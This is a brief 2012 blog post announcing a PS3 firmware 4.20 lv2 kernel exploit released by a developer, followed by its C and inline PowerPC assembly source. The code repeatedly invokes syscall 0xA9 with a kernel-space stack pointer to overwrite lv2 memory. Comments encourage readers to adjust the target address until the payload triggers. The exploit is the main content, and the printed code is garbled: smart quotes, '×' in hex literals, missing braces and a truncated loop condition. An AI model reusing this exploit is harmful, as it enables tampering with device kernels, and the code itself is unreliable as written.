KDSBest And His lv2 Exploit

September 23, 2012

Well known developer KDSBest has released his lv2 exploit to the development community with the hopes of hacking the PS3 wide open to the world of homebrew. Using Firmware 4.20 KDSBest has managed to achieve a lv2 exploit on the PS3, unfortunately at this point all he has managed to do is crash the PS3 due to an overwriting of some memory addresses but in the right hands and some hard work we could see progress in the future, who knows.

//compile: ppu-gcc kds2.c -o kds2.elf
//or: ppu-lv2-gcc kds2.c -o kds2.elf

register unsigned long long payloadHolder2 asm (“r21″);
register unsigned long long payloadHolder asm (“r20″);
register unsigned long long stackpointer asm (“r1″);
register unsigned long long counter asm (“r25″);
register unsigned long long bufferStackpointer asm (“r26″);

int __volatile__ main(int argc, const char* argv[])

// backup Stack pointer
bufferStackpointer = stackpointer;

payloadHolder = 0x3960024F3960024FUL;
payloadHolder2 = 0x4400000244000002UL;

// Incrementer
counter = 0×00;

// Play with that address till the panic is executed, I lack of time todo so
// add always 2 or 4 to it, i would try 4 or 8… bla bla you will get the idea
stackpointer = 0x8000000000000100UL;
doItAgain:
// KDSBest Payload
// Prepare for our Syscall

asm(“li %r0, 0×0″);
asm(“li %r3, 0×6″);
asm(“li %r4, 0×1″);
// li r11, 0x24F -> PANIC
asm(“mr %r22, %r20″);
asm(“mr %r23, %r20″);
asm(“mr %r24, %r20″);
asm(“mr %r27, %r20″);
asm(“mr %r28, %r20″);
asm(“mr %r29, %r20″);
asm(“mr %r30, %r20″);
asm(“mr %r31, %r20″);

// Stack Pointer = Build Address of LV2
stackpointer += counter;

// Syscall 0xA9
asm(“li %r11, 0xA9″);
asm(“sc”);
counter += 0×04;

// We write sc
asm(“mr %r22, %r21″);
asm(“mr %r23, %r21″);
asm(“mr %r24, %r21″);
asm(“mr %r27, %r21″);
asm(“mr %r28, %r21″);
asm(“mr %r29, %r21″);
asm(“mr %r30, %r21″);
asm(“mr %r31, %r21″);

// Stack Pointer = Build Address of LV2
stackpointer += counter;

// Syscall 0xA9
asm(“li %r11, 0xA9″);
asm(“sc”);
counter += 0×04;

if(counter goto doItAgain;

stackpointer = bufferStackpointer;
return 0;

Tweet this!Tweet this!

Previous post:

Next post: